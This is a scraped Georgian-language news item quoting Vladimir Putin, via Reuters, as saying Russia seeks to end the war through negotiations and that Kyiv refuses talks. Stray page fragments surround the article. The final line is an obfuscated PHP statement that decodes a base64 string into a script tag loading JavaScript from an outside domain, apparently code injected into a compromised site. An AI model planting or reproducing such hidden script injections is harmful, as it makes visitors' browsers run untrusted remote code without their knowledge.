celsiusi
ავერსი შნაიდერი
ჩვენი ამოცანა არ არის კონფლიქტის გაღვივება, არამედ პირიქით, დავასრულოთ ეს ომი. ჩვენ ვისწრაფვით, დავასრულოთ ეს და რაც მალე, მით უკეთესი“, – „როიტერის“ ინფორმაციით, ამის შესახებ რუსეთის პრეზიდენტმა ვლადიმერ პუტინმა განაცხადა.
პუტინის თქმით, ძალადობის ინტენსიფიკაცია გაუმართლებელ დანაკარგებს იწვევს.
რუსეთის პრეზიდენტის განცხადებით, ყველა შეიარაღებული კონფლიქტი მოლაპარაკებებით სრულდება.
„ყველა შეიარაღებული კონფლიქტი სრულდება ასე თუ ისე რაღაც სახის მოლაპარაკებებით დიპლომატიურ ველზე“, – განაცხადა რუსეთის პრეზიდენტმა.
მისივე თქმით, ადრე თუ გვიან კონფლიქტის ყველა მონაწილე ჯდება და შეთანხმებას აფორმებს. ამასთან, ვლადიმერ პუტინმა აღნიშნა, რომ მოლაპარაკებებზე უარს კიევი ამბობს.
„რაც მალე გააცნობიერებენ ამას ისინი, ვინც გვეწინააღმდეგება, მით უკეთესი. ჩვენ ამაზე უარი არასდროს გვითქვამს“, – განაცხადა პუტინმა.
505
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");